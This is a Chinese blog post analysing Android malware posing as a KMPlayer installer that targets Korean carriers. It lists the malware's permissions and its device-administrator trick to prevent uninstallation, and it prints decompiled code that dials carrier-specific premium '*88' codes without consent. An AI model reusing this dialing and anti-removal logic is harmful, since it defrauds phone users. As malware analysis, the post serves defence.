一个android病毒分析com.example.com.android.message2
工作之余,在等项目反馈,无聊之中去分析病毒代码,今天来给大家分析一款新型的手机病毒,发现腾讯和360都没有被查杀,可见这些杀毒软件只会跟在别人屁股后面。
这款病毒伪装为KMPlayer的安装软件,如图,下载在电脑会是
apk包名为:com.example.com.android.message2
apk的权限三个比较重要的
<uses-permission android:name="android.permission.RECEIVE_SMS" />//读取短信
<uses-permission android:name="android.permission.READ_PHONE_STATE" />>//读取电话状态
<uses-permission android:name="android.permission.CALL_PHONE" /> //打电话
apk会以短信域名的方式收到而点击下载自动安装
点安装看下一步会发生什么情况
安装完成会我打开发现软件直接跳进要激活设备管理器
这个功能主机是把软件功能用户在软件管理变灰,不让用户删除
二秒钟后,这个病毒会打拨打电话给游戏冲值
代码如下
String str;
if ("olleh".equals(HeartReceiver.a(this.a)))
str = "*88" + this.b + "*";
while (true)
{
Intent localIntent = new Intent("android.intent.action.CALL", Uri.fromParts("tel", str, null));
localIntent.setFlags(268697600);
this.c.startActivity(localIntent);
return;
if ("SKTelecom".equals(HeartReceiver.a(this.a)))
str = "*88" + this.b + "*";
else if ("LG U+".equals(HeartReceiver.a(this.a)))
str = "*88#" + this.b;
else
str = "*88" + this.b + "*";
调用CALL来拔打电话,Sk,LG,OLL分别的韩国三大移动商。
同时还带有服务身指家号码群发短信。